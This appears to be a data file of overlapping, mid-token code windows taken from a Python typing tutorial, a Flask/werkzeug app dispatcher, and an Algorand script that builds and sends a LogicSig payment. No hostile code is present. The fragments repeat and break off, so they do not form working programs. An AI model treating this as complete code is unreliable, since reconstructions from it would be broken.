TIMEOUT: Final[List[int]] = [1,2,3,4,5,6] # class FastConnector(Connection): # TIMEOUT = [50,30,40]", "# class Connection: # TIMEOUT: Final[List[int]] = [1,2,3,4,5,6] # class FastConnector(Connection): # TIMEOUT", "+ b concat(f\"foo \", u\"bar \") concat(b\"foo \", b\"bar \") concat(u\"foo \", b\"bar", "print(MAX_SIZE) # class Connection: # TIMEOUT: Final[List[int]] = [1,2,3,4,5,6] # class FastConnector(Connection): #", "as fp: fp.write(\"Hey, this is a text\") # class WithoutClassVars: # vardict =", "WithoutClassVars.vardict = {\"val\": 10} class WithClassVars: vardict: ClassVar[dict[str, int]] = {} print(vardict) obj", "if mode == 'r': with open(file, mode) as fp: print(fp.read()) elif mode ==", "mode: Literal['r', 'w', 'rb', 'wb']): if mode == 'r': with open(file, mode) as", "fp: print(fp.read()) elif mode == 'w': with open(file, mode) as fp: fp.write(\"Hey, this", "# MAX_SIZE: Final = 9000 # MAX_SIZE += 1 # print(MAX_SIZE) # class", "= WithClassVars() # obj.vardict = {\"name\": \"matrix\"} WithClassVars.vardict = {\"val\": 10} # Testing", "text\") # class WithoutClassVars: # vardict = {} # print(vardict) # obj =", "AnyStr, b: AnyStr) -> AnyStr: return a + b concat(f\"foo \", u\"bar \")", "-1 elif a > b: return +1 else: return False except Exception as", "Callable, name: str) -> None: print(func(name)) test_callable(test_optional, name=\"Matrix\") def test_literals(file: str, mode: Literal['r',", "obj.vardict = {\"name\": \"matrix\"} # WithoutClassVars.vardict = {\"val\": 10} class WithClassVars: vardict: ClassVar[dict[str,", "with open(file, mode) as fp: print(fp.read()) elif mode == 'w': with open(file, mode)", "{name}\" def test_callable(func: Callable, name: str) -> None: print(func(name)) test_callable(test_optional, name=\"Matrix\") def test_literals(file:", "lenght def print_tuple(data: Tuple[Any, ...]) -> None: print(data) def test_union(a: Union[int, float], b:", "str) -> None: print(func(name)) test_callable(test_optional, name=\"Matrix\") def test_literals(file: str, mode: Literal['r', 'w', 'rb',", "b: Union[int, float]) -> Union[bool, int, str]: try: if a == b: return", "-> None: print(func(name)) test_callable(test_optional, name=\"Matrix\") def test_literals(file: str, mode: Literal['r', 'w', 'rb', 'wb']):", "concat(a: AnyStr, b: AnyStr) -> AnyStr: return a + b concat(f\"foo \", u\"bar", "Any, AnyStr, Callable, ClassVar, Final, List, Literal, Optional, Tuple, Union # This a", "Union[int, float]) -> Union[bool, int, str]: try: if a == b: return True", "a < b: return -1 elif a > b: return +1 else: return", "return +1 else: return False except Exception as err: return f\"Error - {err}\"", "mode) as fp: fp.write(\"Hey, this is a text\") # class WithoutClassVars: # vardict", "Union[int, float], b: Union[int, float]) -> Union[bool, int, str]: try: if a ==", "b: return -1 elif a > b: return +1 else: return False except", "variable lenght def print_tuple(data: Tuple[Any, ...]) -> None: print(data) def test_union(a: Union[int, float],", "False except Exception as err: return f\"Error - {err}\" def test_optional(name: Optional[str] =", "return -1 elif a > b: return +1 else: return False except Exception", "None: return None return f\"Hello {name}\" def test_callable(func: Callable, name: str) -> None:", "10} class WithClassVars: vardict: ClassVar[dict[str, int]] = {} print(vardict) obj = WithClassVars() #", "-> Optional[str]: if name is None: return None return f\"Hello {name}\" def test_callable(func:", "from typing import Any, AnyStr, Callable, ClassVar, Final, List, Literal, Optional, Tuple, Union", "Callable, ClassVar, Final, List, Literal, Optional, Tuple, Union # This a tuple defined", "# print(MAX_SIZE) # class Connection: # TIMEOUT: Final[List[int]] = [1,2,3,4,5,6] # class FastConnector(Connection):", "'r': with open(file, mode) as fp: print(fp.read()) elif mode == 'w': with open(file,", "a == b: return True elif a < b: return -1 elif a", "WithClassVars() # obj.vardict = {\"name\": \"matrix\"} WithClassVars.vardict = {\"val\": 10} # Testing typing.Final", "b: return True elif a < b: return -1 elif a > b:", "Tuple[Any, ...]) -> None: print(data) def test_union(a: Union[int, float], b: Union[int, float]) ->", "open(file, mode) as fp: fp.write(\"Hey, this is a text\") # class WithoutClassVars: #", "print(func(name)) test_callable(test_optional, name=\"Matrix\") def test_literals(file: str, mode: Literal['r', 'w', 'rb', 'wb']): if mode", "= {} # print(vardict) # obj = WithoutClassVars() # obj.vardict = {\"name\": \"matrix\"}", "# print(vardict) # obj = WithoutClassVars() # obj.vardict = {\"name\": \"matrix\"} # WithoutClassVars.vardict", "f\"Error - {err}\" def test_optional(name: Optional[str] = None) -> Optional[str]: if name is", "return True elif a < b: return -1 elif a > b: return", "TIMEOUT = [50,30,40] def concat(a: AnyStr, b: AnyStr) -> AnyStr: return a +", "return f\"Error - {err}\" def test_optional(name: Optional[str] = None) -> Optional[str]: if name", "as err: return f\"Error - {err}\" def test_optional(name: Optional[str] = None) -> Optional[str]:", "f\"Hello {name}\" def test_callable(func: Callable, name: str) -> None: print(func(name)) test_callable(test_optional, name=\"Matrix\") def", "# WithoutClassVars.vardict = {\"val\": 10} class WithClassVars: vardict: ClassVar[dict[str, int]] = {} print(vardict)", "TIMEOUT: Final[List[int]] = [1,2,3,4,5,6] # class FastConnector(Connection): # TIMEOUT = [50,30,40] def concat(a:", "elif mode == 'w': with open(file, mode) as fp: fp.write(\"Hey, this is a", "def test_literals(file: str, mode: Literal['r', 'w', 'rb', 'wb']): if mode == 'r': with", "True elif a < b: return -1 elif a > b: return +1", "== 'r': with open(file, mode) as fp: print(fp.read()) elif mode == 'w': with", "def test_optional(name: Optional[str] = None) -> Optional[str]: if name is None: return None", "as fp: print(fp.read()) elif mode == 'w': with open(file, mode) as fp: fp.write(\"Hey,", "mode) as fp: print(fp.read()) elif mode == 'w': with open(file, mode) as fp:", "with variable lenght def print_tuple(data: Tuple[Any, ...]) -> None: print(data) def test_union(a: Union[int,", "this is a text\") # class WithoutClassVars: # vardict = {} # print(vardict)", "= {} print(vardict) obj = WithClassVars() # obj.vardict = {\"name\": \"matrix\"} WithClassVars.vardict =", "\"matrix\"} WithClassVars.vardict = {\"val\": 10} # Testing typing.Final # MAX_SIZE: Final = 9000", "# class WithoutClassVars: # vardict = {} # print(vardict) # obj = WithoutClassVars()", "'w', 'rb', 'wb']): if mode == 'r': with open(file, mode) as fp: print(fp.read())", "# obj.vardict = {\"name\": \"matrix\"} # WithoutClassVars.vardict = {\"val\": 10} class WithClassVars: vardict:", "else: return False except Exception as err: return f\"Error - {err}\" def test_optional(name:", "Literal['r', 'w', 'rb', 'wb']): if mode == 'r': with open(file, mode) as fp:", "'w': with open(file, mode) as fp: fp.write(\"Hey, this is a text\") # class", "Optional, Tuple, Union # This a tuple defined with variable lenght def print_tuple(data:", "Optional[str]: if name is None: return None return f\"Hello {name}\" def test_callable(func: Callable,", "is None: return None return f\"Hello {name}\" def test_callable(func: Callable, name: str) ->", "AnyStr, Callable, ClassVar, Final, List, Literal, Optional, Tuple, Union # This a tuple", "# vardict = {} # print(vardict) # obj = WithoutClassVars() # obj.vardict =", "Library/typing/typing/special_form.py from typing import Any, AnyStr, Callable, ClassVar, Final, List, Literal, Optional, Tuple,", "obj = WithoutClassVars() # obj.vardict = {\"name\": \"matrix\"} # WithoutClassVars.vardict = {\"val\": 10}", "FastConnector(Connection): # TIMEOUT = [50,30,40] def concat(a: AnyStr, b: AnyStr) -> AnyStr: return", "-> Union[bool, int, str]: try: if a == b: return True elif a", "name=\"Matrix\") def test_literals(file: str, mode: Literal['r', 'w', 'rb', 'wb']): if mode == 'r':", "try: if a == b: return True elif a < b: return -1", "'rb', 'wb']): if mode == 'r': with open(file, mode) as fp: print(fp.read()) elif", "is a text\") # class WithoutClassVars: # vardict = {} # print(vardict) #", "class WithoutClassVars: # vardict = {} # print(vardict) # obj = WithoutClassVars() #", "# obj = WithoutClassVars() # obj.vardict = {\"name\": \"matrix\"} # WithoutClassVars.vardict = {\"val\":", "MAX_SIZE += 1 # print(MAX_SIZE) # class Connection: # TIMEOUT: Final[List[int]] = [1,2,3,4,5,6]", "<filename>Standard Library/typing/typing/special_form.py from typing import Any, AnyStr, Callable, ClassVar, Final, List, Literal, Optional,", "test_callable(test_optional, name=\"Matrix\") def test_literals(file: str, mode: Literal['r', 'w', 'rb', 'wb']): if mode ==", "test_union(a: Union[int, float], b: Union[int, float]) -> Union[bool, int, str]: try: if a", "err: return f\"Error - {err}\" def test_optional(name: Optional[str] = None) -> Optional[str]: if", "a text\") # class WithoutClassVars: # vardict = {} # print(vardict) # obj", "obj.vardict = {\"name\": \"matrix\"} WithClassVars.vardict = {\"val\": 10} # Testing typing.Final # MAX_SIZE:", "= {\"val\": 10} class WithClassVars: vardict: ClassVar[dict[str, int]] = {} print(vardict) obj =", "< b: return -1 elif a > b: return +1 else: return False", "+= 1 # print(MAX_SIZE) # class Connection: # TIMEOUT: Final[List[int]] = [1,2,3,4,5,6] #", "MAX_SIZE: Final = 9000 # MAX_SIZE += 1 # print(MAX_SIZE) # class Connection:", "Optional[str] = None) -> Optional[str]: if name is None: return None return f\"Hello", "> b: return +1 else: return False except Exception as err: return f\"Error", "# TIMEOUT = [50,30,40] def concat(a: AnyStr, b: AnyStr) -> AnyStr: return a", "Final[List[int]] = [1,2,3,4,5,6] # class FastConnector(Connection): # TIMEOUT = [50,30,40] def concat(a: AnyStr,", "mode == 'w': with open(file, mode) as fp: fp.write(\"Hey, this is a text\")", "vardict = {} # print(vardict) # obj = WithoutClassVars() # obj.vardict = {\"name\":", "# obj.vardict = {\"name\": \"matrix\"} WithClassVars.vardict = {\"val\": 10} # Testing typing.Final #", "== 'w': with open(file, mode) as fp: fp.write(\"Hey, this is a text\") #", "int, str]: try: if a == b: return True elif a < b:", "= {\"name\": \"matrix\"} WithClassVars.vardict = {\"val\": 10} # Testing typing.Final # MAX_SIZE: Final", "b: AnyStr) -> AnyStr: return a + b concat(f\"foo \", u\"bar \") concat(b\"foo", "class WithClassVars: vardict: ClassVar[dict[str, int]] = {} print(vardict) obj = WithClassVars() # obj.vardict", "-> None: print(data) def test_union(a: Union[int, float], b: Union[int, float]) -> Union[bool, int,", "None: print(data) def test_union(a: Union[int, float], b: Union[int, float]) -> Union[bool, int, str]:", "+1 else: return False except Exception as err: return f\"Error - {err}\" def", "'wb']): if mode == 'r': with open(file, mode) as fp: print(fp.read()) elif mode", "Union[bool, int, str]: try: if a == b: return True elif a <", "return f\"Hello {name}\" def test_callable(func: Callable, name: str) -> None: print(func(name)) test_callable(test_optional, name=\"Matrix\")", "print(vardict) # obj = WithoutClassVars() # obj.vardict = {\"name\": \"matrix\"} # WithoutClassVars.vardict =", "{\"name\": \"matrix\"} # WithoutClassVars.vardict = {\"val\": 10} class WithClassVars: vardict: ClassVar[dict[str, int]] =", "def print_tuple(data: Tuple[Any, ...]) -> None: print(data) def test_union(a: Union[int, float], b: Union[int,", "float], b: Union[int, float]) -> Union[bool, int, str]: try: if a == b:", "obj = WithClassVars() # obj.vardict = {\"name\": \"matrix\"} WithClassVars.vardict = {\"val\": 10} #", "except Exception as err: return f\"Error - {err}\" def test_optional(name: Optional[str] = None)", "str, mode: Literal['r', 'w', 'rb', 'wb']): if mode == 'r': with open(file, mode)", "= {\"name\": \"matrix\"} # WithoutClassVars.vardict = {\"val\": 10} class WithClassVars: vardict: ClassVar[dict[str, int]]", "WithClassVars.vardict = {\"val\": 10} # Testing typing.Final # MAX_SIZE: Final = 9000 #", "class Connection: # TIMEOUT: Final[List[int]] = [1,2,3,4,5,6] # class FastConnector(Connection): # TIMEOUT =", "= [1,2,3,4,5,6] # class FastConnector(Connection): # TIMEOUT = [50,30,40] def concat(a: AnyStr, b:", "1 # print(MAX_SIZE) # class Connection: # TIMEOUT: Final[List[int]] = [1,2,3,4,5,6] # class", "Testing typing.Final # MAX_SIZE: Final = 9000 # MAX_SIZE += 1 # print(MAX_SIZE)", "Final, List, Literal, Optional, Tuple, Union # This a tuple defined with variable", "name: str) -> None: print(func(name)) test_callable(test_optional, name=\"Matrix\") def test_literals(file: str, mode: Literal['r', 'w',", "str]: try: if a == b: return True elif a < b: return", "# This a tuple defined with variable lenght def print_tuple(data: Tuple[Any, ...]) ->", "== b: return True elif a < b: return -1 elif a >", "WithClassVars: vardict: ClassVar[dict[str, int]] = {} print(vardict) obj = WithClassVars() # obj.vardict =", "-> AnyStr: return a + b concat(f\"foo \", u\"bar \") concat(b\"foo \", b\"bar", "= {\"val\": 10} # Testing typing.Final # MAX_SIZE: Final = 9000 # MAX_SIZE", "# MAX_SIZE += 1 # print(MAX_SIZE) # class Connection: # TIMEOUT: Final[List[int]] =", "name is None: return None return f\"Hello {name}\" def test_callable(func: Callable, name: str)", "tuple defined with variable lenght def print_tuple(data: Tuple[Any, ...]) -> None: print(data) def", "\"matrix\"} # WithoutClassVars.vardict = {\"val\": 10} class WithClassVars: vardict: ClassVar[dict[str, int]] = {}", "...]) -> None: print(data) def test_union(a: Union[int, float], b: Union[int, float]) -> Union[bool,", "{\"name\": \"matrix\"} WithClassVars.vardict = {\"val\": 10} # Testing typing.Final # MAX_SIZE: Final =", "- {err}\" def test_optional(name: Optional[str] = None) -> Optional[str]: if name is None:", "Literal, Optional, Tuple, Union # This a tuple defined with variable lenght def", "print(vardict) obj = WithClassVars() # obj.vardict = {\"name\": \"matrix\"} WithClassVars.vardict = {\"val\": 10}", "= [50,30,40] def concat(a: AnyStr, b: AnyStr) -> AnyStr: return a + b", "import Any, AnyStr, Callable, ClassVar, Final, List, Literal, Optional, Tuple, Union # This", "def test_union(a: Union[int, float], b: Union[int, float]) -> Union[bool, int, str]: try: if", "Exception as err: return f\"Error - {err}\" def test_optional(name: Optional[str] = None) ->", "WithoutClassVars: # vardict = {} # print(vardict) # obj = WithoutClassVars() # obj.vardict", "test_callable(func: Callable, name: str) -> None: print(func(name)) test_callable(test_optional, name=\"Matrix\") def test_literals(file: str, mode:", "typing import Any, AnyStr, Callable, ClassVar, Final, List, Literal, Optional, Tuple, Union #", "fp: fp.write(\"Hey, this is a text\") # class WithoutClassVars: # vardict = {}", "{} print(vardict) obj = WithClassVars() # obj.vardict = {\"name\": \"matrix\"} WithClassVars.vardict = {\"val\":", "This a tuple defined with variable lenght def print_tuple(data: Tuple[Any, ...]) -> None:", "vardict: ClassVar[dict[str, int]] = {} print(vardict) obj = WithClassVars() # obj.vardict = {\"name\":", "return None return f\"Hello {name}\" def test_callable(func: Callable, name: str) -> None: print(func(name))", "[50,30,40] def concat(a: AnyStr, b: AnyStr) -> AnyStr: return a + b concat(f\"foo", "{\"val\": 10} # Testing typing.Final # MAX_SIZE: Final = 9000 # MAX_SIZE +=", "# Testing typing.Final # MAX_SIZE: Final = 9000 # MAX_SIZE += 1 #", "9000 # MAX_SIZE += 1 # print(MAX_SIZE) # class Connection: # TIMEOUT: Final[List[int]]" ]
[ "run_simple from flask import Flask from api import app as api_app from frontend", "Flask from api import app as api_app from frontend import app as frontend_app", "application = DispatcherMiddleware(frontend_app, {'/api': api_app}) if __name__ == '__main__': run_simple(HOSTNAME, PORT, application, use_reloader=USE_RELOADER,", "api import app as api_app from frontend import app as frontend_app from settings", "frontend_app from settings import HOSTNAME, PORT, USE_RELOADER, USE_DEBUGGER application = DispatcherMiddleware(frontend_app, {'/api': api_app})", "import app as api_app from frontend import app as frontend_app from settings import", "werkzeug.serving import run_simple from flask import Flask from api import app as api_app", "import DispatcherMiddleware from werkzeug.serving import run_simple from flask import Flask from api import", "import app as frontend_app from settings import HOSTNAME, PORT, USE_RELOADER, USE_DEBUGGER application =", "frontend import app as frontend_app from settings import HOSTNAME, PORT, USE_RELOADER, USE_DEBUGGER application", "USE_DEBUGGER application = DispatcherMiddleware(frontend_app, {'/api': api_app}) if __name__ == '__main__': run_simple(HOSTNAME, PORT, application,", "HOSTNAME, PORT, USE_RELOADER, USE_DEBUGGER application = DispatcherMiddleware(frontend_app, {'/api': api_app}) if __name__ == '__main__':", "app as frontend_app from settings import HOSTNAME, PORT, USE_RELOADER, USE_DEBUGGER application = DispatcherMiddleware(frontend_app,", "PORT, USE_RELOADER, USE_DEBUGGER application = DispatcherMiddleware(frontend_app, {'/api': api_app}) if __name__ == '__main__': run_simple(HOSTNAME,", "from api import app as api_app from frontend import app as frontend_app from", "from werkzeug.serving import run_simple from flask import Flask from api import app as", "from frontend import app as frontend_app from settings import HOSTNAME, PORT, USE_RELOADER, USE_DEBUGGER", "werkzeug.wsgi import DispatcherMiddleware from werkzeug.serving import run_simple from flask import Flask from api", "DispatcherMiddleware from werkzeug.serving import run_simple from flask import Flask from api import app", "as api_app from frontend import app as frontend_app from settings import HOSTNAME, PORT,", "api_app from frontend import app as frontend_app from settings import HOSTNAME, PORT, USE_RELOADER,", "from settings import HOSTNAME, PORT, USE_RELOADER, USE_DEBUGGER application = DispatcherMiddleware(frontend_app, {'/api': api_app}) if", "USE_RELOADER, USE_DEBUGGER application = DispatcherMiddleware(frontend_app, {'/api': api_app}) if __name__ == '__main__': run_simple(HOSTNAME, PORT,", "as frontend_app from settings import HOSTNAME, PORT, USE_RELOADER, USE_DEBUGGER application = DispatcherMiddleware(frontend_app, {'/api':", "from werkzeug.wsgi import DispatcherMiddleware from werkzeug.serving import run_simple from flask import Flask from", "from flask import Flask from api import app as api_app from frontend import", "import run_simple from flask import Flask from api import app as api_app from", "app as api_app from frontend import app as frontend_app from settings import HOSTNAME,", "import HOSTNAME, PORT, USE_RELOADER, USE_DEBUGGER application = DispatcherMiddleware(frontend_app, {'/api': api_app}) if __name__ ==", "import Flask from api import app as api_app from frontend import app as", "flask import Flask from api import app as api_app from frontend import app", "<filename>src/init.py from werkzeug.wsgi import DispatcherMiddleware from werkzeug.serving import run_simple from flask import Flask", "settings import HOSTNAME, PORT, USE_RELOADER, USE_DEBUGGER application = DispatcherMiddleware(frontend_app, {'/api': api_app}) if __name__", "= DispatcherMiddleware(frontend_app, {'/api': api_app}) if __name__ == '__main__': run_simple(HOSTNAME, PORT, application, use_reloader=USE_RELOADER, use_debugger=USE_DEBUGGER)" ]
[ "while not (txinfo.get('confirmed-round') and txinfo.get('confirmed-round') > 0): print(\"Waiting for confirmation\") last_round += 1", "# arg1 = arg_str.encode() # lsig = transaction.LogicSig(program, args=[arg1]) # see more info", "program requires an arg # if not, omit args param arg1 = (123).to_bytes(8,", "sender = lsig.address() # Get suggested parameters params = algod_client.suggested_params() # Comment out", "args param arg1 = (123).to_bytes(8, 'big') lsig = LogicSig(program, args=[arg1]) sender = lsig.address()", "= open(myprogram, 'r').read() # Compile TEAL program # // This code is meant", "string>\" # arg1 = arg_str.encode() # lsig = transaction.LogicSig(program, args=[arg1]) # see more", "\"\"\" Utility function to wait until the transaction is confirmed before proceeding. \"\"\"", "Send raw LogicSigTransaction to network txid = algod_client.send_transaction(lstx) print(\"Transaction ID: \" + txid)", "omit args param arg1 = (123).to_bytes(8, 'big') lsig = LogicSig(program, args=[arg1]) sender =", "# see more info here: https://developer.algorand.org/docs/features/asc1/sdks/#accessing-teal-program-from-sdks # Create arg to pass if TEAL", "confirmation\") last_round += 1 client.status_after_block(last_round) txinfo = client.pending_transaction_info(txid) print(\"Transaction {} confirmed in round", "receiver, amount, closeremainderto) # Create the LogicSigTransaction with contract account LogicSig lstx =", "print(\"Response Hash = \", response['hash']) # Create logic sig programstr = response['result'] t", "proceeding. \"\"\" last_round = client.status().get('last-round') txinfo = client.pending_transaction_info(txid) while not (txinfo.get('confirmed-round') and txinfo.get('confirmed-round')", "= arg_str.encode() # lsig = transaction.LogicSig(program, args=[arg1]) # see more info here: https://developer.algorand.org/docs/features/asc1/sdks/#accessing-teal-program-from-sdks", "10000 closeremainderto = None # Create a transaction txn = PaymentTxn( sender, params,", "learning purposes only # // It should not be used in production #", "Read TEAL program data = open(myprogram, 'r').read() # Compile TEAL program # //", "arg1 = (123).to_bytes(8, 'big') lsig = LogicSig(program, args=[arg1]) sender = lsig.address() # Get", "# Read TEAL program data = open(myprogram, 'r').read() # Compile TEAL program #", "to wait until the transaction is confirmed before proceeding. \"\"\" last_round = client.status().get('last-round')", "8 bytes response = algod_client.compile(data) # Print(response) print(\"Response Result = \", response['result']) print(\"Response", "be used in production # // samplearg.teal # arg_0 # btoi # int", "<reponame>TheChronicMonster/docs from algosdk.v2client import algod from algosdk.future.transaction import PaymentTxn, LogicSig, LogicSigTransaction import base64", "= PaymentTxn( sender, params, receiver, amount, closeremainderto) # Create the LogicSigTransaction with contract", "# Build transaction amount = 10000 closeremainderto = None # Create a transaction", "= LogicSig(program, args=[arg1]) sender = lsig.address() # Get suggested parameters params = algod_client.suggested_params()", "Pushes: uint64 # // converts bytes X as big endian to uint64 #", "receiver = \"<receiver_address>\" algod_client = algod.AlgodClient(algod_token, algod_address) myprogram = \"samplearg.teal\" # Read TEAL", "last_round = client.status().get('last-round') txinfo = client.pending_transaction_info(txid) while not (txinfo.get('confirmed-round') and txinfo.get('confirmed-round') > 0):", "LogicSig, LogicSigTransaction import base64 def wait_for_confirmation(client, txid): \"\"\" Utility function to wait until", "than 8 bytes response = algod_client.compile(data) # Print(response) print(\"Response Result = \", response['result'])", "LogicSigTransaction with contract account LogicSig lstx = LogicSigTransaction(txn, lsig) # transaction.write_to_file([lstx], \"simple.stxn\") #", "client.pending_transaction_info(txid) print(\"Transaction {} confirmed in round {}.\".format( txid, txinfo.get('confirmed-round'))) return txinfo try: #", "is meant for learning purposes only # // It should not be used", "print(\"Transaction {} confirmed in round {}.\".format( txid, txinfo.get('confirmed-round'))) return txinfo try: # Create", "= \"<KEY>\" algod_address = \"http://localhost:4001\" receiver = \"<receiver_address>\" algod_client = algod.AlgodClient(algod_token, algod_address) myprogram", "= 10000 closeremainderto = None # Create a transaction txn = PaymentTxn( sender,", "print(\"Waiting for confirmation\") last_round += 1 client.status_after_block(last_round) txinfo = client.pending_transaction_info(txid) print(\"Transaction {} confirmed", "lsig = LogicSig(program, args=[arg1]) sender = lsig.address() # Get suggested parameters params =", "# Compile TEAL program # // This code is meant for learning purposes", "True params.fee = 1000 # Build transaction amount = 10000 closeremainderto = None", "\"simple.stxn\") # Send raw LogicSigTransaction to network txid = algod_client.send_transaction(lstx) print(\"Transaction ID: \"", "0): print(\"Waiting for confirmation\") last_round += 1 client.status_after_block(last_round) txinfo = client.pending_transaction_info(txid) print(\"Transaction {}", "LogicSig(program, args=[arg1]) sender = lsig.address() # Get suggested parameters params = algod_client.suggested_params() #", "// btoi panics if the input is longer than 8 bytes response =", "client.pending_transaction_info(txid) while not (txinfo.get('confirmed-round') and txinfo.get('confirmed-round') > 0): print(\"Waiting for confirmation\") last_round +=", "(123).to_bytes(8, 'big') lsig = LogicSig(program, args=[arg1]) sender = lsig.address() # Get suggested parameters", "# int 123 # == # // bto1 # // Opcode: 0x17 #", "Build transaction amount = 10000 closeremainderto = None # Create a transaction txn", "= lsig.address() # Get suggested parameters params = algod_client.suggested_params() # Comment out the", "amount = 10000 closeremainderto = None # Create a transaction txn = PaymentTxn(", "\", response['hash']) # Create logic sig programstr = response['result'] t = programstr.encode() program", "suggested parameters params = algod_client.suggested_params() # Comment out the next two (2) lines", "TEAL program requires an arg # if not, omit args param arg1 =", "// Pushes: uint64 # // converts bytes X as big endian to uint64", "print(program) # string parameter # arg_str = \"<my string>\" # arg1 = arg_str.encode()", "= \"http://localhost:4001\" receiver = \"<receiver_address>\" algod_client = algod.AlgodClient(algod_token, algod_address) myprogram = \"samplearg.teal\" #", "use suggested fees params.flat_fee = True params.fee = 1000 # Build transaction amount", "params = algod_client.suggested_params() # Comment out the next two (2) lines to use", "Pops: ... stack, []byte # // Pushes: uint64 # // converts bytes X", "uint64 # // converts bytes X as big endian to uint64 # //", "base64 def wait_for_confirmation(client, txid): \"\"\" Utility function to wait until the transaction is", "LogicSigTransaction to network txid = algod_client.send_transaction(lstx) print(\"Transaction ID: \" + txid) wait_for_confirmation(algod_client, txid)", "client.status_after_block(last_round) txinfo = client.pending_transaction_info(txid) print(\"Transaction {} confirmed in round {}.\".format( txid, txinfo.get('confirmed-round'))) return", "confirmed before proceeding. \"\"\" last_round = client.status().get('last-round') txinfo = client.pending_transaction_info(txid) while not (txinfo.get('confirmed-round')", "It should not be used in production # // samplearg.teal # arg_0 #", "This code is meant for learning purposes only # // It should not", "= algod_client.compile(data) # Print(response) print(\"Response Result = \", response['result']) print(\"Response Hash = \",", "pass if TEAL program requires an arg # if not, omit args param", "transaction is confirmed before proceeding. \"\"\" last_round = client.status().get('last-round') txinfo = client.pending_transaction_info(txid) while", "algosdk.v2client import algod from algosdk.future.transaction import PaymentTxn, LogicSig, LogicSigTransaction import base64 def wait_for_confirmation(client,", "not (txinfo.get('confirmed-round') and txinfo.get('confirmed-round') > 0): print(\"Waiting for confirmation\") last_round += 1 client.status_after_block(last_round)", "arg to pass if TEAL program requires an arg # if not, omit", "Create an algod client algod_token = \"<KEY>\" algod_address = \"http://localhost:4001\" receiver = \"<receiver_address>\"", "// converts bytes X as big endian to uint64 # // btoi panics", "transaction amount = 10000 closeremainderto = None # Create a transaction txn =", "see more info here: https://developer.algorand.org/docs/features/asc1/sdks/#accessing-teal-program-from-sdks # Create arg to pass if TEAL program", "= client.status().get('last-round') txinfo = client.pending_transaction_info(txid) while not (txinfo.get('confirmed-round') and txinfo.get('confirmed-round') > 0): print(\"Waiting", "lsig = transaction.LogicSig(program, args=[arg1]) # see more info here: https://developer.algorand.org/docs/features/asc1/sdks/#accessing-teal-program-from-sdks # Create arg", "for confirmation\") last_round += 1 client.status_after_block(last_round) txinfo = client.pending_transaction_info(txid) print(\"Transaction {} confirmed in", "is longer than 8 bytes response = algod_client.compile(data) # Print(response) print(\"Response Result =", "algod_client.send_transaction(lstx) print(\"Transaction ID: \" + txid) wait_for_confirmation(algod_client, txid) except Exception as e: print(e)", "big endian to uint64 # // btoi panics if the input is longer", "import base64 def wait_for_confirmation(client, txid): \"\"\" Utility function to wait until the transaction", "= \", response['hash']) # Create logic sig programstr = response['result'] t = programstr.encode()", "LogicSigTransaction(txn, lsig) # transaction.write_to_file([lstx], \"simple.stxn\") # Send raw LogicSigTransaction to network txid =", "in production # // samplearg.teal # arg_0 # btoi # int 123 #", "PaymentTxn, LogicSig, LogicSigTransaction import base64 def wait_for_confirmation(client, txid): \"\"\" Utility function to wait", "# Create arg to pass if TEAL program requires an arg # if", "and txinfo.get('confirmed-round') > 0): print(\"Waiting for confirmation\") last_round += 1 client.status_after_block(last_round) txinfo =", "import algod from algosdk.future.transaction import PaymentTxn, LogicSig, LogicSigTransaction import base64 def wait_for_confirmation(client, txid):", "to pass if TEAL program requires an arg # if not, omit args", "params.flat_fee = True params.fee = 1000 # Build transaction amount = 10000 closeremainderto", "lsig) # transaction.write_to_file([lstx], \"simple.stxn\") # Send raw LogicSigTransaction to network txid = algod_client.send_transaction(lstx)", "# Comment out the next two (2) lines to use suggested fees params.flat_fee", "longer than 8 bytes response = algod_client.compile(data) # Print(response) print(\"Response Result = \",", "production # // samplearg.teal # arg_0 # btoi # int 123 # ==", "txinfo = client.pending_transaction_info(txid) while not (txinfo.get('confirmed-round') and txinfo.get('confirmed-round') > 0): print(\"Waiting for confirmation\")", "account LogicSig lstx = LogicSigTransaction(txn, lsig) # transaction.write_to_file([lstx], \"simple.stxn\") # Send raw LogicSigTransaction", "# arg_str = \"<my string>\" # arg1 = arg_str.encode() # lsig = transaction.LogicSig(program,", "converts bytes X as big endian to uint64 # // btoi panics if", "arg # if not, omit args param arg1 = (123).to_bytes(8, 'big') lsig =", "to uint64 # // btoi panics if the input is longer than 8", "# // Pushes: uint64 # // converts bytes X as big endian to", "programstr.encode() program = base64.decodebytes(t) print(program) # string parameter # arg_str = \"<my string>\"", "uint64 # // btoi panics if the input is longer than 8 bytes", "Opcode: 0x17 # // Pops: ... stack, []byte # // Pushes: uint64 #", "= algod_client.suggested_params() # Comment out the next two (2) lines to use suggested", "programstr = response['result'] t = programstr.encode() program = base64.decodebytes(t) print(program) # string parameter", "an algod client algod_token = \"<KEY>\" algod_address = \"http://localhost:4001\" receiver = \"<receiver_address>\" algod_client", "# lsig = transaction.LogicSig(program, args=[arg1]) # see more info here: https://developer.algorand.org/docs/features/asc1/sdks/#accessing-teal-program-from-sdks # Create", "Hash = \", response['hash']) # Create logic sig programstr = response['result'] t =", "base64.decodebytes(t) print(program) # string parameter # arg_str = \"<my string>\" # arg1 =", "(2) lines to use suggested fees params.flat_fee = True params.fee = 1000 #", "last_round += 1 client.status_after_block(last_round) txinfo = client.pending_transaction_info(txid) print(\"Transaction {} confirmed in round {}.\".format(", "\"\"\" last_round = client.status().get('last-round') txinfo = client.pending_transaction_info(txid) while not (txinfo.get('confirmed-round') and txinfo.get('confirmed-round') >", "btoi # int 123 # == # // bto1 # // Opcode: 0x17", "... stack, []byte # // Pushes: uint64 # // converts bytes X as", "= 1000 # Build transaction amount = 10000 closeremainderto = None # Create", "if TEAL program requires an arg # if not, omit args param arg1", "parameters params = algod_client.suggested_params() # Comment out the next two (2) lines to", "algod_client.compile(data) # Print(response) print(\"Response Result = \", response['result']) print(\"Response Hash = \", response['hash'])", "to use suggested fees params.flat_fee = True params.fee = 1000 # Build transaction", "stack, []byte # // Pushes: uint64 # // converts bytes X as big", "program = base64.decodebytes(t) print(program) # string parameter # arg_str = \"<my string>\" #", "network txid = algod_client.send_transaction(lstx) print(\"Transaction ID: \" + txid) wait_for_confirmation(algod_client, txid) except Exception", "wait_for_confirmation(client, txid): \"\"\" Utility function to wait until the transaction is confirmed before", "# btoi # int 123 # == # // bto1 # // Opcode:", "# Create a transaction txn = PaymentTxn( sender, params, receiver, amount, closeremainderto) #", "= algod_client.send_transaction(lstx) print(\"Transaction ID: \" + txid) wait_for_confirmation(algod_client, txid) except Exception as e:", "with contract account LogicSig lstx = LogicSigTransaction(txn, lsig) # transaction.write_to_file([lstx], \"simple.stxn\") # Send", "# // samplearg.teal # arg_0 # 